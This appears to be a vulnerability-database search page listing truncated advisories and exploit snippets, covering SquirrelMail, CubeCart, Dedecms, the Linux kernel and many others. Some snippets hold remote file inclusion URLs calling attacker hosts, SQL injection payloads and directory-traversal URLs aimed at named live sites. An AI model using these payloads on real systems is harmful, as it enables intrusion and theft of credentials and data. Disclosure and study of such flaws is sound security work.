56796 matches found
SquirrelMail G/PGP加密插件多个远程命令执行漏洞
BUGTRAQ ID: 24874,24782 CVECAN ID: CVE-2005-1924,CVE-2006-4169 SquirrelMail是一个多功能的用PHP4实现的Webmail程序,可运行于Linux/Unix类操作系统下。 SquirrelMail的实现上存在多个输入验证漏洞,远程攻击者可能利用这些漏洞在服务器上执行任意命令。 SquirrelMail中的G/PGP加密插件没有正确地过滤所包含的某些文件,gpghelp.php和gpghelpbase.php文件中可能包含有通过“help” HTTP GET请求参数所提供的本地文件,代码如下: 68 // Help...
Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit
No description provided by source. :. GOODFELLAS Security Research TEAM .: :. http://goodfellas.shellcode.com.ar .: sasatl.dll 1.5.0.531 Program Checker - Javascript Heap Spraying Exploit ======================================================================== Internal ID: VULWAR200706280...
EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability
No description provided by source. Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability Author: CyberGhost Demo Page: http://www.haberguvercini.com Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir Vuln. Username -...
Remotesoft .NET Explorer远程堆栈缓冲区溢出漏洞
Remotesoft .NET Explorer是一款反汇编工具。 Remotesoft .NET Explorer处理cpp文件存在一个缓冲区溢出,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 构建恶意cpp文件,诱使用户打开可触发。 Remotesoft .NET Explorer 2.0.1 目前没有详细解决方案提供: http://www.remotesoft.com/linker/ /usr/bin/ python print "--------------------------------------------------------------" print...
RedBlog Index.PHP远程文件包含漏洞
RedBlog是一款基于PHP的WEB应用程序。 RedBlog不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Index.PHP'脚本对用户提交的'rootpath'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 RedBLoG RedBLoG 0.5 http://redblog.sourceforge.net/ http://www.example.com/Path/index.php?rootpath==http://evilscripts?...
LibTIFF库匿名字段合并拒绝服务漏洞
Libtiff是一种TIFF规范的标准ANSI C实现库。 Libtiff处理定制标记存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 建立匿名字段在前,合并CODEC信息的字段可导致recognised字段出现不期望的值,这种状态可导致异常行为,导致应用程序崩溃或任意代码执行等问题。 S.u.S.E. UnitedLinux 1.0 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x8664 S.u.S.E. Linux...
NetBSD Ftpd和Tnftpd移植远程缓冲区溢出漏洞
tnftpd是一款NetBSD FTP服务程序的移植版本。 NetBSD tnftpd存在远程堆栈溢出问题,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 要触发此漏洞,攻击者必须建立文件夹和使用GLOB特殊字符如星号来溢出内部堆栈缓冲区,精心构建提交数据可能以进程权限执行任意指令。 tnftpd tnftpd 20040810 NetBSD NetBSD 3.0 目前没有解决方案提供: http://freshmeat.net/projects/tnftpd !perl $$$ NetBSD ftpd and ports Remote ROOOOOT $HOLE$ $$$...
Microsoft Windows MHTML超长URI串溢出漏洞(MS06-043)
Microsoft Windows是微软发布的非常流行的操作系统。 inetcomm.dll在使用"mhtml:" URI解析器处理URL时存在栈溢出漏洞,成功利用此漏洞的攻击者可以完全控制受影响的系统。 攻击者可以通过超长的URL来触发这个漏洞,如诱骗用户通过Internet Explorer打开恶意的站点或打开特制的Internet快捷方式。 Microsoft Windows XP SP2 Microsoft Windows XP Professional x64 Edition Microsoft Windows Server 2003 x64 Edition Microsoft...
Nukedit CMS <= 4.9.6 Unauthorized Admin Add Exploit
No description provided by source. KAPDA - Security Science Researchers Institute Advisory : http://www.kapda.ir/advisory-337.html Vendor : http://www.nukedit.com/ What is : Nukedit is a Free Content Management Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable! Discovered...
Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability
No description provided by source. Title: Knowledge Base Mod for PHPbb = 2.0.2 remote file inclusion URL: http://www.phpbb2.de/dload.php?action=file&fileid=538 Dork: "Powered by Knowledge Base" Credits: Oo Exploit: /includes/kbconstants.php?modulerootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.co...
CubeCart <= 3.0.6 Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl cijfer-ccxpl - CubeCart =3.0.6 Remote Command Execution Exploit Copyright c 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ perl ./cijfer-ccxpl.pl -h www.xxx.com -d [email protected] /$ id;uname -a uid=48apache...
WordPress The Plus Addons for Elementor插件身份验证绕过漏洞(CVE-2021-24175)
...
Insteon Hub HTTPExecuteGet Firmware Update host Parameter Buffer Overflow Vulnerability(CVE-2017-14445)
Summary An exploitable buffer overflow vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly handles the host parameter during a firmware update request, leading to a buffer overflow on a global section. An attacker can send an HTTP GET...
phpyun重装getshell
...
Dedecms V5.7后台的两处getshell(CVE-2018-9175)
第一个是常见的思路,把语句写入inc文件,然后在其他的include语句中,包含了恶意代码进而getshell。 漏洞代码在:/dede/sysverifies.php 代码如下: else if $action == 'getfiles' if!isset$refiles ShowMsg"你没进行任何操作!","sysverifies.php"; exit; $cacheFiles = DEDEDATA.'/modifytmp.inc'; $fp = fopen$cacheFiles, 'w'; fwrite$fp, ''; fclose$fp; $dirinfos = ''; if$...
QCMS最新版3.0.1后台登录验证可绕过,结合任意文件上传可前台getshell
...
Multiple vulnerabilities in all versions of ASUS routers
1 ASUSWRT 3.0.0.4.376 - multiple vulnerabilities in httpd server all versions of AsusWRT at the time of report to vendor, for previous 376 version see next section 1. Highly predictable session tokens The session token is generated for an authenticated user using stdlib rand function. The token...
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
Summary ZKAccess Systems are built on flexible, open technology to provide management, real-time monitoring, and control of your access control system-all from a browser, with no additional software to install. Our secure Web-hosted infrastructure and centralized online administration reduce your...
VMware VNC Pointer Decode Code Execution Vulnerability(CVE-2017-4941)
Summary An exploitable code execution vulnerability exists in the remote management functionality of VMware . A specially crafted set of VNC packets can cause a type confusion resulting in stack overwrite, which could lead to code execution. An attacker can initiate a VNC session to trigger this...
Apple Core Graphics BMP Framework img_decode_read Remote Code Execution Vulnerability(CVE-2016-4637)
SUMMARY An exploitable out of bounds write exists in the handling of BMP images on Apple OS X and iOS. A crafted BMP document can lead to an out of bounds write resulting in remote code execution. Vulnerability can be triggered via a saved BMP file delivered by other means when opened in any...
Windows KEPT remote code execution vulnerability analysis(CVE-2017-11779)
根据 Microsoft 安全通告,多个版本 Windows 中的 DNSAPI.dll 在处理 DNS response 时可导致 SYSTEM 权限 RCE。 以 DNS Client API DLL 10.0.15063.0 与 10.0.15063.674 为例,补丁对比, 可知漏洞存在于 DNSAPI.dll 中的 Nsec3RecordRead 函数,那么可以确定问题就是出在解析 DNS response 的 NSEC3 Resource record,为了构造 PoC,先得了解这个 "NSEC3" 的背景。首先,DNS 协议数据结构如下图所示, 例如,当访问...
Apple: Multiple Race Conditions in PCIe Message Ring protocol leading to OOB Write and OOB Read(CVE-2017-7115)
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. On iOS, the "AppleBCMWLANBusInterfacePCIe"...
Artifex MuPDf JBIG2 Parser Code Execution Vulnerability(CVE-2016-8729)
Summary An exploitable memory corruption vulnerability exists in the JBIG2 parser of Artifex MuPDF 1.9. A specially crafted PDF can cause a negative number to be passed to a memset resulting in memory corruption and potential code execution. An attacker can specially craft a PDF and send to the...
Poppler PDF Image Display DCTStream::readScan() Code Execution Vulnerability(CVE-2017-2814)
Summary An exploitable heap overflow vulnerability exists in the image rendering functionality of Poppler-0.53.0. A specifically crafted pdf can cause an image resizing after allocation has already occurred, resulting in heap corruption which can lead to code execution. An attacker controlled PDF...
FreeRDP Rdp Client License Read Product Info Denial of Service Vulnerability(CVE-2017-2838)
Summary An exploitable denial of service vulnerability exists within the handling of challenge packets in FreeRDP 2.0.0-beta1+android11. A specially crafted challenge packet can cause the program termination leading to a denial of service condition. An attacker can compromise the server or use ma...
Google Android Broadcom Wi-fi Driver Information Disclosure Vulnerability(CVE-2017-0633)
An information disclosure vulnerability in the Broadcom Wi-Fi driver could enable a local malicious component to access data outside of its permission levels. This issue is rated as Moderate because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10,...
Roundcube mail body of the stored cross site Vulnerability(CVE-2017-6820)
Author: Badcode, sebao know Chong Yu 404 security lab Date: 2017-03-17 0x00 vulnerability overview 1. Vulnerability description Roundcube is a widely used open source e-mail program, in the globe there are many organizations and companies are in use. On the server to successfully install...
Wordpress Plugin Olimometer 2.56 - SQL Injection
Vulnerability parameters: olimometerid= Using sqlmap Parameter: olimometerid GET Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometerid=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL = 5.0.12 AND time-based blind Payload: olimometerid=1...
74cms V3.4(<20140310) plus/ajax_officebuilding.php SQL 注入漏洞
No description provided by source...
Windows OLE Package Manager SandWorm Exploit
No description provided by source. !/usr/bin/env python import os import zipfile import sys ''' Full Exploit: http://www.exploit-db.com/sploits/35019.tar.gz Very quick and ugly SandWorm CVE-2014-4114 exploit builder Exploit Title: CVE-2014-4114 SandWorm builder Built to run on: Linux/MacOSX Date:...
Supermicro Onboard IPMI Port 49152 敏感文件泄露漏洞
关于 IPMI:智能平台管理接口 IPMI 是一种开放标准的硬件管理接口规格,定义了嵌入式管理子系统进行通信的特定方法。IPMI 信息通过基板管理控制器 BMC(位于 IPMI 规格的硬件组件上)进行交流。IPMI是智能型平台管理接口(Intelligent Platform Management Interface)的缩写,是管理基于...
某教育类通用cms任意文件下载漏洞
简要描述: 某教育类通用cms任意文件下载漏洞 详细说明: 不知道算不算通用 可下载web.config文件,数据库信息文件泄露 http://sbc.xzit.edu.cn/hxjc/DownLoad.aspx?Accessory=../web.config http://hedds.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://www.emcjs.org/DownLoad.aspx?Accessory=../web.config...
Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit
No description provided by source. / i-CAN-haz-MODHARDEN.c Linux Kernel 2.6.36-rc1 CAN BCM Privilege Escalation Exploit Jon Oberheide [email protected] http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959 Ben Hawkes discovered an integer overflow in th...
AllMyGuests <= 0.4.1 (cfg_serverpath) Remote File Include Vulnerability
No description provided by source. ============================================================================ AllMyGuests = ?AMGconfigcfgserverpath Remote File Inclusion Exploit ============================================================================ Scirpt Infected signin.php Critical leve...
Mac OSX Server DirectoryService Buffer Overflow
No description provided by source. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Mac OSX Server DirectoryService buffer overflow 1. Advisory Information Title: Mac OSX Server DirectoryService buffer overflow Advisory ID: CORE-2013-0103 Advisory URL:...
Emefa Guestbook 3.0 - Remote Database Disclosure Vulnerability
No description provided by source. Title: Emefa Guestbook V 3.0 Remote Database Disclosure Vulnerability Credit: Cyber.Zer0 E-mail: Cyber.Zer04tHotmaildotcom Download: http://www.emefa.dyndns.org/downloads/ Remote: Yes Dork: Emefa Guestbook V 3.0 --=Database Disclosure=--...
Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability
No description provided by source. \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV88$2008 ----------------------------------------------------------------------------------------- ECHOADV88$2008 Prozilla Hosting Index directory.php catid Blind Sql...
Siemens Simatic S7-300 PLC Remote Memory Viewer
No description provided by source. Exploit Title: Siemens Simatic S7 300 Remote Memory Viewer Backdoor Date: 7-13-2012 Exploit Author: Dillon Beresford Vendor Homepage: http://www.siemens.com/ Tested on: Siemens Simatic S7-1200 PLC CVE : None require 'msf/core' class Metasploit3 Msf::Auxiliary...
sweetrice cms 0.6.7 - Multiple Vulnerabilities
No description provided by source. Vulnerability ID: HTB22669 Reference: http://www.htbridge.ch/advisory/resetadminpasswordinsweetricecms.html Product: SweetRice CMS Vendor: basic-cms.org http://www.basic-cms.org/ Vulnerable Version: 0.6.7 Vendor Notification: 21 October 2010 Vulnerability Type:...
Invision Power Board <= 3.3.4 unserialize Regex Bypass
No description provided by source. ?php / So this is the patch that sanitizes, static public function safeUnserialize $serialized // unserialize will return false for object declared with small cap o // as well as if there is any ws between O and : if isstring $serialized && strpos $serialized, \...
WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability
No description provided by source. post Card catid Remote SQL Injection Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc MaiL : [email protected] script : http://webbdomain.com/php/postcarden/index2.php script : http://webbdomain.com/php/postcardir/index2.php DorK :...
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities
No description provided by source. Cannonbolt Portfolio Manager v1.0 Stored XSS and SQL Injection Vulnerabilities Vendor: IWCn Systems Inc. Product web page: http://www.iwcn.ws Affected version: 1.0 Summary: Cannonbolt Portfolio Manager is a sleek and AJAX based PHP script to manage projects and...
TP-Link TL-WR740N Wireless Router - Denial of Service Exploit
No description provided by source. ?!/usr/local/bin/perl TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit Vendor: TP-LINK Technologies Co., Ltd. Product web page: http://www.tp-link.us Affected version: - Firmware version: 3.16.4 Build 130205 Rel.63875n Released: 2/5/2013 -...
Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +------------------------------------------------------------------------------+ | Packet Storm Advisory 2013-0903-1 | | http://packetstormsecurity.com/ |...
F-Secure E-mail/Server Security OpenSSL TLS/DTLS心跳信息泄漏漏洞
CVE ID:CVE-2014-0160 F-Secure E-mail/Server Security/F-Secure Server Security产品存在安全漏洞。 F-Secure E-mail/Server Security/F-Secure Server Security所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 F-Secure E-mail and Server Security 10.x F-Secure E-mail...
GnuTLS证书验证安全限制绕过漏洞
BUGTRAQ ID: 65919 CVECAN ID: CVE-2014-0092 GnuTLS是用于实现TLS加密协议的函数库。 GnuTLS 3.1.22, 3.2.12之前版本在实现上存在安全漏洞,X.509证书验证的错误处理不正确,可将故障证书标记为有效证书,这可使远程用户利用此漏洞绕过证书验证。 0 GnuTLS GnuTLS 3.2.12 GnuTLS GnuTLS 3.1.22 厂商补丁: GnuTLS ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://gnutls.org...
Linksys系列未明远程代码执行漏洞
No description provided by source. !/usr/bin/php ?php / Exploit for 0day linksys unauthenticated remote code execution vulnerability. As exploited by TheMoon worm; Discovered in the wild on Feb 13, 2013 by Johannes Ullrich. I was hoping this would stay under-wraps until a firmware patch could be...
Discuz!某处功能缺陷可导致特定情况下无视安全提问直接登录
简要描述: 详细说明: Discuz!X云平台有QQ互联功能,可使用QQ账号绑定论坛账户登陆论坛。但是,如果论坛账户设置了安全提问的情况下,使用关联的QQ账号登陆依然不需要安全提问,造成安全问题。 漏洞证明: 0x01.我在一次安全测试中拿下了某小型领主站的数据库,并把它还原到了我的phpmyadmin中。经过查找,其中有5d6d某版主的密码hash。(此处有一个提示,precommonmember表中保存的并不是真实的密码md5,真正的hash在preucentermembers表中,算法为md5md5$pass.$hash 0x02.把hash拿去cmd5解密...
FCKeditor 2.4.3 /fckeditor/editor/filemanager/upload/asp/class_upload.asp 文件上传漏洞
...
PHP 5.3.x 'open_basedir'安全限制绕过漏洞
BUGTRAQ ID: 54612 CVE ID: CVE-2012-3365 PHP 是一种 HTML 内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。 PHP 5.3.15之前版本在SQLite扩展中存在错误,可被利用绕过"openbasedir"功能。 0 PHP 5.3.x 厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.php.net...